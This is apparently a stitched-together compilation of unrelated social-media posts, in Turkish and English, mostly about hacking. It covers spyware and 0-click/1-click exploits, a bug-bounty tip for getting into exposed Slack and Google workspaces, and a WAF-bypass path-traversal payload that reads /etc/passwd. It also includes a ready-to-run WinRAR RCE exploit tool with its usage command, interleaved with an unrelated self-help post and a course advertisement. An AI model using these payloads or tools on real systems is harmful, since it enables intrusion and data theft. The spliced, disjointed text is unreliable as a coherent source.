İnternet ağı bana hep büyüleyici gelmiştir; yıllardır sektörde olmayan arkadaşlarıma da, eşime de defalarca heyecanla anlatırım.
Dün bu tutkuyu bir adım öteye taşıyıp https://t.co/yay8zZisb7’u geliştirdim 🥳
Hem sıfırdan başlayanlar hem de meraklı öğrenciler için; teori + simülasyon içeren interaktif bir öğrenme alanı sizlerle. ���
bizim alanlar gelmiş hemen damlıyorum,
Şimdi olayı teknik olabilite ve benim fikirlerim olarak 2 kısımda değerlendireceğim
son kullanıcı bilgisayarlar hacklenebilir mi ?
Kişisel bilgisayarlara(PC) - evde olan bilgisayarlara 0click ile sızılması senaryosu pek olası değil hatta günümüzde, imkansıza yakın. Nat arkasında olması çoğu zaman fazlasıyla yeterli oluyor. Aynı ağdaysanız 0click ile hedefleyebilirsiniz ama bu senaryo çoğu zaman pek yapılabilir gibi değil, özellikle kişisel bilgisayarlarda. Genelde 0click windows veya linux exploitler lateral movementlar için kullanılıyor veya aynı ağa düştükten bir sonraki hedefe zıplamak için kullanılıyor (eternal blue, bluekeep vs). Ev bilgisayarlarına - son kullanıcı bilgisayarlarına bu exploitler giriş aşaması olarak pek de kullanılmıyor (her bilgisayarda erişilebilir olan ve exploit edilen servisler-uygulamalardan bahsediyorum, web sunucular veya garip uygulamalar değil).
Ha ne zaman kullanılır, hedefi ciddi takip edersiniz, aynı ağa bağlanmaya çalışırsınız (starbucks, iş yeri vs) gerekirse fiziksel bir yakınlık kurarsınız (belki bluetooth?) ve öyle denersiniz ama işte bu kadar kasmak yerine 1click ataklar daha yapılabilir oluyor.
1click ataklar ne ?
Bir urle tıkladığınızda veya bir email açtığınızda veya bir şeye tıkladığınızda da bilgisayarınız (komple bilgisayardan bahsediyorum) ele geçirilebilir. Terimden de anlaşılacağı üzere sadece 1 click gereklidir. Bunun için nat olmuş olmamış pek önemli değil. O yüzden en derinlere de nüfuz edebilirsiniz, bir çok nat ve fw arkasına mesela. Genelde insanların gündelik hayatlarında kullandığı uygulamalar hedef alınır. Bunlar da çok büyük oranda oranda chromium (electron ile yazılan her app) - veya web browserları hedef alır. Çünkü sadece bir web sitesine gitmeniz yeterli olur günün sonunda. Hacklendiğinizi ruhunuz bile duymaz.
Samsung 1click -
https://t.co/4ZWaCOHsOs
chrome 1click -
https://t.co/4jCSc24jk1
discord 1click -
https://t.co/z77iljyODI
En önemlilerinden biri sanırım op aurora. Google, Çinliler tarafından tam olarak böyle bir browser exploiti ile hedef alındı, bayağı bayağı içlerine sızıldı ve hacklendiler ve sonra bu olayların devamında project zero falan kuruldu. Bu olay önemli bir kırılım noktasıydı
https://t.co/OgXqzNCVB2
Direk Google'ın harika bir belgeseli var burada kesinlikle izlemenizi tavsiye ederim
https://t.co/OyU12fhY54
whatsapp hacklenebilir mi - telefon hacklenebilir mi, videoda bahsedilen bilgiler sızdırılabilir mi ?
evet, bunu daha önceden de çok kere anlattım, çok detaya girmeye gerek yok. 3-5 yazı bırakıyorum okuyun lütfen.
https://t.co/SqsFTT98L1
https://t.co/gfYPeapVR9
https://t.co/gNJXZu9Zlp
https://t.co/cEsvRC9aWI -- citizenlabın bir çok araştırması
Abi peki sence bizim polisimiz bunları yapıyor mudur ?
Belki bu cevabı beklemiyordunuz ama evet. Bu exploitleri 0dan geliştirmeden, satan insanlardan satın almayı tercih edebiliyorsunuz. NSO group, HackingTeam, Exodus, DFSec gibi oluşumlar bu exploitleri devletere ve parası olan kişilere satarlar(Türkiyeden de bir çok bireysel kişinin aldığı dedikoduları yayıldı zaman zaman). Devletler de bunları espiyonaj - kontrespiyonaj için kullanırlar.
HackingTeam hackinden sonra sızdırılan mailleri okuyabilirsiniz. Basitçe https://t.co/cWK6v1jxSa şeklinde bir araştırma yapmanız, bu araçlara kimlerin ilgisinin ne şekilde olduğunu gösterecektir.
https://t.co/6GE5GUMiFq
Abi peki sence bizim polisimiz cidden bu kadar yapıyor mudur ?
Bu exploitler değerli ve pahalı exploitler, kullanmak için de bir knowhow gerekiyor ve bu operasyonların kapsamlı ekiplerce sürdürülmesi gerekiyor. Basit bir polisin asla haberinin bile olmayacağını sanıyorum. Çok nadir ve az kişiye kullanıldığını düşünüyorum, ama evet %100 kullanılıyordur.
Ben hedef alınmış mıyımdır veya alınacak mıyımdır ?
%99 oranda hayır. Bu ataklar pahalı ve nadir ataklar. Şu videoyu izleyebilirsiniz bu konu özelinde https://t.co/aIRIk8v8zG
Kaizen Yasaları’nı hayatıma uygulamaya başladım ve fark ettim ki: Sürekli ertelediğim işler, bitmeyen hedefler ve karmaşa… Hepsi küçük adımlarla düzene girebiliyormuş. Şimdi size Kaizen’in nasıl çalıştığını ve bende nasıl işe yaradığını anlatıyorum. 👇
Hello everyone ♥
a little bit write-up of #bugbountytip#bugbountytips I am going to write here .....
Title:
getting unauthorized access on 3rd party's/workspaces & and building your checklist for quickly locating bugs there via massive recon
we know that its helpful to look for google
groups/docs/etc..
Slack as well just like when the amazing @h4x0r_dz shared days ago ..
Use google dork "site:https://t.co/ravW2tHHcP"
so I was not in a good mode the last months to doing Google Dorks, so what I did was build a checklist ready for me & very huge one
for EX:
https://t.co/wPxAHXvC18
https://t.co/hs3VHvhT92
https://t.co/ravW2tHHcP
and here is just an example you can add more similar workspaces for your checklist
thin I extracted all internet endpoints and as example here join[.]slack[.]com
https://t.co/OlHQSEQ6Qz
https://t.co/e8jB8H6nMS
https://t.co/w5h4VkESyQ
you can use the ready tools to do it such as waymore
important note: you have to keep your checklist updated every week
and from here I just keep looking for the company name or domain name to see if there's anything connected
and mostly the company name or domain name in the URL it self EX: tesla
https://t.co/QesyI4MHu2
Ex For Bugs found:
1 unauthorized access to the workspaces
(PII | Information disclose)
2 account takeover as Ex: valid signup employee link
3 account takeover as Ex: valid reset password employee link
now about Slack, as an example if you found an invitation link for tesla
Tesla https://t.co/QesyI4MHu2 and that link was not valid, don't stop here
it will redirect for Ex:
tesla-internal[.]slack[.]com
here back and start looking manually for endpoints of this subdomain as well EX:
https://t.co/w2dhvfdBhL
now there are a lot of 3rd party's/workspaces I just shared here
slack & Google Docs/groups
What I wrote is a bit long and annoying to some, so I apologize. I hope, as usual, that this will be useful to all who follow me here.
#Bugounty
don't forget to retweet if you like it ♥♥♥
🔥Bypassing WAF by adding multiple slashes to gain SSI/ Path traversal. This is my 2nd successful shot in the dark attempt.
credit: @nav1n0x
Payload: GET /assets/css///////../../../../../../../../etc/passwd
#BugBounty#bugbountytips
I'm starting a new series of blogposts where I will study old CVEs.
First one is CVE-2021-26084. Confluence OGNL injection preauth RCE. It was easy to catch but was tricky to understand what's going on. Enjoy !
https://t.co/yQYi0M5KhE
Şu an kurs 70 TL, normal fiyatı da 250TL civarı olacak. Kursu aldığınızda benden sınırsız danışmanlık da almış oluyorsunuz. Sınırsız soru sorabiliyorsunuz. Amacım cidden bu sektöre daha fazla yetenekli insan kazandırmaktan başka bir şey değil.
https://t.co/UHEAQ4ml26
I just released an easy to use and easy to install tool for CVE-2023-38831, WinRAR RCE for versions before 6.23
pip install rarce
$ rarce "interesting file.png" "exp.cmd" "output.rar"
https://t.co/sIzAo4PByT
#infosec#CyberSecurity#bugbountytips